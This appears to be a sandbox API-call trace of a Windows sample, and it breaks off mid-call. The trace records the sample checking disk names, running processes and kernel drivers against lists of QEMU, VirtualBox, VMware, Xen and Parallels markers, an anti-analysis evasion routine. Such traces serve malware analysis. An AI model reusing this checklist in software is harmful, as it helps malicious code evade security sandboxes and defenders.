0x0 [0111.252] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vbox") returned 0x0 [0111.252] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="xen") returned 0x0 [0111.252] LocalFree (hMem=0x47aac0) returned 0x0 [0111.252] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0111.252] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x47aac0 [0111.252] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x47aac0, Length=0x46, ResultLength=0x19ff48 | out: KeyInformation=0x47aac0, ResultLength=0x19ff48) returned 0x0 [0111.253] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="qemu") returned 0x0 [0111.253] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="virtio") returned 0x0 [0111.253] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vmware") returned 0x0 [0111.253] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vbox") returned 0x0 [0111.253] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="xen") returned 0x0 [0111.253] LocalFree (hMem=0x47aac0) returned 0x0 [0111.254] LocalFree (hMem=0x47a1b0) returned 0x0 [0111.254] NtClose (Handle=0x15c) returned 0x0 [0111.254] LocalFree (hMem=0x478950) returned 0x0 [0111.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x1f840) returned 0xc0000004 [0111.269] LocalAlloc (uFlags=0x40, uBytes=0x20840) returned 0x1d62050 [0111.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1d62050, Length=0x20840, ResultLength=0x19ff54 | out: SystemInformation=0x1d62050, ResultLength=0x19ff54*=0x18820) returned 0x0 [0111.275] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0111.275] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0111.275] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0111.275] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0111.276] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0111.276] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0111.276] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0111.276] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.276] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0111.276] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0111.276] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.276] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.276] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.276] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.276] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.276] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0111.276] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0111.276] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.276] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.276] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.276] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.277] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.277] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0111.277] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0111.277] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.277] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.277] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.277] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.277] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.277] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0111.277] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0111.277] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.277] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.277] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.277] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.278] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.278] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0111.278] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0111.278] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.278] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.278] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.278] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.278] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.278] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0111.278] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0111.278] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.278] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.278] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.278] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.279] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.279] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0111.279] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0111.279] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.279] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.279] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.279] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.279] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.279] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0111.279] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0111.279] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.279] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.279] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.279] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.279] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.279] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0111.279] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0111.279] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.280] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.280] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.280] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.280] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.280] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0111.280] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0111.280] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.280] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.280] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.280] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.280] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.280] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0111.280] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0111.280] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.280] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.280] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.280] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.281] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.281] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0111.281] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0111.281] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.281] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.281] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.281] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.282] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.282] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0111.282] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0111.282] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.282] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.282] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.282] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.282] wcsstr (_Str="far.exe", _SubStr="qemu-ga.exe") returned 0x0 [0111.282] wcsstr (_Str="far.exe", _SubStr="qga.exe") returned 0x0 [0111.282] wcsstr (_Str="far.exe", _SubStr="windanr.exe") returned 0x0 [0111.282] wcsstr (_Str="far.exe", _SubStr="vboxservice.exe") returned 0x0 [0111.282] wcsstr (_Str="far.exe", _SubStr="vboxtray.exe") returned 0x0 [0111.282] wcsstr (_Str="far.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0111.282] wcsstr (_Str="far.exe", _SubStr="prl_tools.exe") returned 0x0 [0111.284] LocalFree (hMem=0x1d62050) returned 0x0 [0111.285] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x9800) returned 0xc0000004 [0111.286] LocalAlloc (uFlags=0x40, uBytes=0xa800) returned 0x1d62050 [0111.286] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x1d62050, Length=0xa800, ResultLength=0x19ff54 | out: SystemInformation=0x1d62050, ResultLength=0x19ff54*=0x9800) returned 0x0 [0111.287] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0111.287] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0111.287] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0111.287] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0111.287] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0111.287] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0111.287] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0111.287] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0111.287] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0111.287] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0111.287] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0111.287] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0111.288] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0111.288] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0111.288] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0111.288] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0111.288] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0111.288] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0111.288] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0111.288] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0111.288] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0111.288] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0111.288] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0111.289] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0111.289] strstr (_Str="kd.dll", _SubStr="vmci.s") returned 0x0 [0111.289] strstr (_Str="kd.dll", _SubStr="vmusbm") returned 0x0 [0111.289] strstr (_Str="kd.dll", _SubStr="vmmous") returned 0x0 [0111.289] strstr (_Str="kd.dll", _SubStr="vm3dmp") returned 0x0 [0111.289] strstr (_Str="kd.dll", _SubStr="vmrawd") returned 0x0 [0111.289] strstr (_Str="kd.dll", _SubStr="vmmemc") returned 0x0 [0111.289] strstr (_Str="kd.dll", _SubStr="vboxgu") returned 0x0 [0111.289] strstr (_Str="kd.dll", _SubStr="vboxsf") returned 0x0 [0111.289] strstr (_Str="kd.dll", _SubStr="vboxmo") returned 0x0 [0111.290] strstr (_Str="kd.dll", _SubStr="vboxvi") returned 0x0 [0111.290] strstr (_Str="kd.dll", _SubStr="vboxdi") returned 0x0 [0111.290] strstr (_Str="kd.dll", _SubStr="vioser") returned 0x0 [0111.291] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0111.291] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0111.291] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0111.291] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0111.291] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0111.291] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0111.291] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0111.291] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0111.291] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0111.291] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0111.292] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0111.292] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0111.292] strstr (_Str="werkernel.sys", _SubStr="vmci.s") returned 0x0 [0111.292] strstr (_Str="werkernel.sys", _SubStr="vmusbm") returned 0x0 [0111.292] strstr (_Str="werkernel.sys", _SubStr="vmmous") returned 0x0 [0111.293] strstr (_Str="werkernel.sys", _SubStr="vm3dmp") returned 0x0 [0111.293] strstr (_Str="werkernel.sys", _SubStr="vmrawd") returned 0x0 [0111.293] strstr (_Str="werkernel.sys", _SubStr="vmmemc") returned 0x0 [0111.293] strstr (_Str="werkernel.sys", _SubStr="vboxgu") returned 0x0 [0111.293] strstr (_Str="werkernel.sys", _SubStr="vboxsf") returned 0x0 [0111.293] strstr (_Str="werkernel.sys", _SubStr="vboxmo") returned 0x0 [0111.293] strstr (_Str="werkernel.sys", _SubStr="vboxvi") returned 0x0 [0111.293] strstr (_Str="werkernel.sys", _SubStr="vboxdi") returned 0x0 [0111.293] strstr (_Str="werkernel.sys", _SubStr="vioser") returned 0x0 [0111.305] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0111.306] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0111.306] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0111.306] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0111.306] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0111.306] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0111.306] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0111.306] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0111.306] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0111.306] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0111.306] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0111.306] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0111.306] strstr (_Str="tm.sys", _SubStr="vmci.s") returned 0x0 [0111.306] strstr (_Str="tm.sys", _SubStr="vmusbm") returned 0x0 [0111.306] strstr (_Str="tm.sys", _SubStr="vmmous") returned 0x0 [0111.306] strstr (_Str="tm.sys", _SubStr="vm3dmp") returned 0x0 [0111.306] strstr (_Str="tm.sys", _SubStr="vmrawd") returned 0x0 [0111.306] strstr (_Str="tm.sys", _SubStr="vmmemc") returned 0x0 [0111.306] strstr (_Str="tm.sys", _SubStr="vboxgu") returned 0x0 [0111.306] strstr (_Str="tm.sys", _SubStr="vboxsf") returned 0x0 [0111.306] strstr (_Str="tm.sys", _SubStr="vboxmo") returned 0x0 [0111.306] strstr (_Str="tm.sys", _SubStr="vboxvi") returned 0x0 [0111.306] strstr (_Str="tm.sys", _SubStr="vboxdi") returned 0x0 [0111.306] strstr (_Str="tm.sys", _SubStr="vioser") returned 0x0 [0111.307] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0111.307] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0111.307] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0111.307] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0111.307] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0111.307] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0111.307] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0111.307] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0111.307] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0111.307] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0111.307] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0111.307] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0111.307] strstr (_Str="bootvid.dll", _SubStr="vmci.s") returned 0x0 [0111.307] strstr (_Str="bootvid.dll", _SubStr="vmusbm") returned 0x0 [0111.307] strstr (_Str="bootvid.dll", _SubStr="vmmous") returned 0x0 [0111.307] strstr (_Str="bootvid.dll", _SubStr="vm3dmp") returned 0x0 [0111.307] strstr (_Str="bootvid.dll", _SubStr="vmrawd") returned 0x0 [0111.307] strstr (_Str="bootvid.dll", _SubStr="vmmemc") returned 0x0 [0111.307] strstr (_Str="bootvid.dll", _SubStr="vboxgu") returned 0x0 [0111.308] strstr (_Str="bootvid.dll", _SubStr="vboxsf") returned 0x0 [0111.308] strstr (_Str="bootvid.dll", _SubStr="vboxmo") returned 0x0 [0111.308] strstr (_Str="bootvid.dll", _SubStr="vboxvi") returned 0x0 [0111.308] strstr (_Str="bootvid.dll", _SubStr="vboxdi") returned 0x0 [0111.308] strstr (_Str="bootvid.dll", _SubStr="vioser") returned 0x0 [0111.308] strstr (_Str="cmimcext.sys", _SubStr="vmci.s") returned 0x0 [0111.308] strstr (_Str="cmimcext.sys", _SubStr="vmusbm") returned 0x0 [0111.308] strstr (_Str="cmimcext.sys", _SubStr="vmmous") returned 0x0 [0111.308] strstr (_Str="cmimcext.sys", _SubStr="vm3dmp") returned 0x0 [0111.308] strstr (_Str="cmimcext.sys", _SubStr="vmrawd") returned 0x0 [0111.308] strstr (_Str="cmimcext.sys", _SubStr="vmmemc") returned 0x0 [0111.308] strstr (_Str="cmimcext.sys", _SubStr="vboxgu") returned 0x0 [0111.308] strstr (_Str="cmimcext.sys", _SubStr="vboxsf") returned 0x0 [0111.308] strstr (_Str="cmimcext.sys", _SubStr="vboxmo") returned 0x0 [0111.308] strstr (_Str="cmimcext.sys", _SubStr="vboxvi") returned 0x0 [0111.308] strstr (_Str="cmimcext.sys", _SubStr="vboxdi") returned 0x0 [0111.308] strstr (_Str="cmimcext.sys", _SubStr="vioser") returned 0x0 [0111.309] strstr (_Str="ntosext.sys", _SubStr="vmci.s") returned 0x0 [0111.309] strstr (_Str="ntosext.sys", _SubStr="vmusbm") returned 0x0 [0111.309] strstr (_Str="ntosext.sys", _SubStr="vmmous") returned 0x0 [0111.309] strstr (_Str="ntosext.sys", _SubStr="vm3dmp") returned 0x0 [0111.309] strstr (_Str="ntosext.sys", _SubStr="vmrawd") returned 0x0 [0111.309] strstr (_Str="ntosext.sys", _SubStr="vmmemc") returned 0x0 [0111.309] strstr (_Str="ntosext.sys", _SubStr="vboxgu") returned 0x0 [0111.309] strstr (_Str="ntosext.sys", _SubStr="vboxsf") returned 0x0 [0111.309] strstr (_Str="ntosext.sys", _SubStr="vboxmo") returned 0x0 [0111.309] strstr (_Str="ntosext.sys", _SubStr="vboxvi") returned 0x0 [0111.309] strstr (_Str="ntosext.sys", _SubStr="vboxdi") returned 0x0 [0111.309] strstr (_Str="ntosext.sys", _SubStr="vioser") returned 0x0 [0111.309] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0111.309] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0111.309] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0111.309] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0111.309] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0111.309] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0111.309] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0111.309] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0111.309] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0111.309] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0111.309] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0111.309] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0111.310] strstr (_Str="msrpc.sys", _SubStr="vmci.s") returned 0x0 [0111.310] strstr (_Str="msrpc.sys", _SubStr="vmusbm") returned 0x0 [0111.310] strstr (_Str="msrpc.sys", _SubStr="vmmous") returned 0x0 [0111.310] strstr (_Str="msrpc.sys", _SubStr="vm3dmp") returned 0x0 [0111.310] strstr (_Str="msrpc.sys", _SubStr="vmrawd") returned 0x0 [0111.310] strstr (_Str="msrpc.sys", _SubStr="vmmemc") returned 0x0 [0111.310] strstr (_Str="msrpc.sys", _SubStr="vboxgu") returned 0x0 [0111.310] strstr (_Str="msrpc.sys", _SubStr="vboxsf") returned 0x0 [0111.310] strstr (_Str="msrpc.sys", _SubStr="vboxmo") returned 0x0 [0111.310] strstr (_Str="msrpc.sys", _SubStr="vboxvi") returned 0x0 [0111.310] strstr (_Str="msrpc.sys", _SubStr="vboxdi") returned 0x0 [0111.310] strstr (_Str="msrpc.sys", _SubStr="vioser") returned 0x0 [0111.310] strstr (_Str="fltmgr.sys", _SubStr="vmci.s") returned 0x0 [0111.310] strstr (_Str="fltmgr.sys", _SubStr="vmusbm") returned 0x0 [0111.310] strstr (_Str="fltmgr.sys", _SubStr="vmmous") returned 0x0 [0111.310] strstr (_Str="fltmgr.sys", _SubStr="vm3dmp") returned 0x0 [0111.310] strstr (_Str="fltmgr.sys", _SubStr="vmrawd") returned 0x0 [0111.310] strstr (_Str="fltmgr.sys", _SubStr="vmmemc") returned 0x0 [0111.310] strstr (_Str="fltmgr.sys", _SubStr="vboxgu") returned 0x0 [0111.311] strstr (_Str="fltmgr.sys", _SubStr="vboxsf") returned 0x0 [0111.311] strstr (_Str="fltmgr.sys", _SubStr="vboxmo") returned 0x0 [0111.311] strstr (_Str="fltmgr.sys", _SubStr="vboxvi") returned 0x0 [0111.311] strstr (_Str="fltmgr.sys", _SubStr="vboxdi") returned 0x0 [0111.311] strstr (_Str="fltmgr.sys", _SubStr="vioser") returned 0x0 [0111.311] strstr (_Str="ksecdd.sys", _SubStr="vmci.s") returned 0x0 [0111.311] strstr (_Str="ksecdd.sys", _SubStr="vmusbm") returned 0x0 [0111.316] strstr (_Str="ksecdd.sys", _SubStr="vmmous") returned 0x0 [0111.316] strstr (_Str="ksecdd.sys", _SubStr="vm3dmp") returned 0x0 [0111.316] strstr (_Str="ksecdd.sys", _SubStr="vmrawd") returned 0x0 [0111.316] strstr (_Str="ksecdd.sys", _SubStr="vmmemc") returned 0x0 [0111.316] strstr (_Str="ksecdd.sys", _SubStr="vboxgu") returned 0x0 [0111.316] strstr (_Str="ksecdd.sys", _SubStr="vboxsf") returned 0x0 [0111.316] strstr (_Str="ksecdd.sys", _SubStr="vboxmo") returned 0x0 [0111.316] strstr (_Str="ksecdd.sys", _SubStr="vboxvi") returned 0x0 [0111.316] strstr (_Str="ksecdd.sys", _SubStr="vboxdi") returned 0x0 [0111.317] strstr (_Str="ksecdd.sys", _SubStr="vioser") returned 0x0 [0111.317] strstr (_Str="clipsp.sys", _SubStr="vmci.s") returned 0x0 [0111.317] strstr (_Str="clipsp.sys", _SubStr="vmusbm") returned 0x0 [0111.317] strstr (_Str="clipsp.sys", _SubStr="vmmous") returned 0x0 [0111.317] strstr (_Str="clipsp.sys", _SubStr="vm3dmp") returned 0x0 [0111.317] strstr (_Str="clipsp.sys", _SubStr="vmrawd") returned 0x0 [0111.317] strstr (_Str="clipsp.sys", _SubStr="vmmemc") returned 0x0 [0111.317] strstr (_Str="clipsp.sys", _SubStr="vboxgu") returned 0x0 [0111.317] strstr (_Str="clipsp.sys", _SubStr="vboxsf") returned 0x0 [0111.317] strstr (_Str="clipsp.sys", _SubStr="vboxmo") returned 0x0 [0111.317] strstr (_Str="clipsp.sys", _SubStr="vboxvi") returned 0x0 [0111.317] strstr (_Str="clipsp.sys", _SubStr="vboxdi") returned 0x0 [0111.317] strstr (_Str="clipsp.sys", _SubStr="vioser") returned 0x0 [0111.317] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0111.317] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0111.317] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0111.318] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0111.318] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0111.318] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0111.318] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0111.318] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0111.318] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0111.318] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0111.318] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0111.318] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0111.318] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0111.318] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0111.318] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0111.318] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0111.318] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0111.318] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0111.318] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0111.318] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0111.318] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0111.318] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0111.318] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0111.318] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0111.319] strstr (_Str="acpiex.sys", _SubStr="vmci.s") returned 0x0 [0111.319] strstr (_Str="acpiex.sys", _SubStr="vmusbm") returned 0x0 [0111.319] strstr (_Str="acpiex.sys", _SubStr="vmmous") returned 0x0 [0111.319] strstr (_Str="acpiex.sys", 